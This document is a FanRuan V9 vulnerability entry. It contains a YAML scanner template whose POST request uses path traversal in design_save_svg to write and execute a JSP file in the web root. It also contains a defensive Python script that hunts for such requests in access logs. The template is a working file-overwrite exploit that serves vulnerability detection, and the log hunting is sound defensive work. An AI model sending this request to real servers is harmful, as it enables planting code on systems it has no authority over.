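Vulnerability description
FanRuan V9 has an arbitrary file overwrite vulnerability, which allows an attacker to upload arbitrary files.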
id: fanruan-oa-v9-designsavevg-upload-file

info:
  name: 帆软报表 V9 design_save_svg 任意文件覆盖文件上传
  author: zan8in
  severity: critical
  description: |-
    帆软 V9 存在任意文件覆盖,导致攻击者可以任意文件上传
  tags: finereport,upload,file
  created: 2023/11/14

set:
  rand1: randomLowercase(12)
  r2: randomInt(100,999)
  r3: randomInt(100,999)
rules:
  r0:
    request:
      method: POST
      path: /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp
      headers:
        Content-Type: text/xml;charset=UTF-8
      body: |
        {"__CONTENT__":"<%out.print({{r2}} * {{r3}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%>","__CHARSET__":"UTF-8"}
    expression: response.status == 200
  r1:
    request:
      method: GET
      path: /WebReport/update.jsp
    expression: response.status == 200 && response.body.bcontains(bytes(string(r2*r3)))
expression: r0() && r1()
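For defenders, the request shape in the template above can be hunted for in web access logs. The following is an added example, not part of the original template or of the afrog project: it flags `design_save_svg` requests whose `filePath` leaves the `chartmapsvg/` directory or does not end in `.svg`. The combined log format, the assumption that legitimate saves stay under `chartmapsvg/` with an `.svg` extension, and the function names are all assumptions of this example.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines (combined format, documentation IPs), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [14/Nov/2023:10:01:02 +0800] "POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp HTTP/1.1" 200 12 "-" "-"
198.51.100.7 - - [14/Nov/2023:10:01:03 +0800] "GET /WebReport/update.jsp HTTP/1.1" 200 6 "-" "-"
203.0.113.9 - - [14/Nov/2023:10:05:00 +0800] "POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/china.svg HTTP/1.1" 200 12 "-" "-"
203.0.113.9 - - [14/Nov/2023:10:06:00 +0800] "POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg%2F..%252f..%2Fx.JSP HTTP/1.1" 200 12 "-" "-"
"""
REQ = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
BASE = "chartmapsvg"  # assumption: legitimate saves stay under this directory

def fully_decode(value, rounds=5):
    """Percent-decode several times so %252f-style nested encoding is unwrapped."""
    for _ in range(rounds):
        value = unquote(value)
    return value.replace("\\", "/")  # treat Windows separators like '/'

def check_file_path(raw):
    """Return the reasons a design_save_svg filePath looks like a file overwrite."""
    normalized = posixpath.normpath(fully_decode(raw))
    reasons = []
    if normalized != BASE and not normalized.startswith(BASE + "/"):
        reasons.append("escapes " + BASE + "/")
    if not normalized.lower().endswith(".svg"):
        reasons.append("non-svg extension")
    return reasons

def scan(log_text):
    """Return (client, status, decoded filePath, reasons) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = REQ.match(line)
        if not m:
            continue
        client, _method, target, status = m.groups()
        query = parse_qs(urlsplit(target).query)
        if "design_save_svg" not in query.get("cmd", []):
            continue
        for raw in query.get("filePath", []):
            reasons = check_file_path(raw)
            if reasons:
                findings.append((client, int(status), fully_decode(raw), reasons))
    return findings

for finding in scan(SAMPLE_LOG):
    print(finding)
```

A hit with status 200 followed by a request from the same client for a new `.jsp` under `/WebReport/` is worth triaging first; parameters sent in the request body instead of the URL will not appear in access logs and need WAF or application logging.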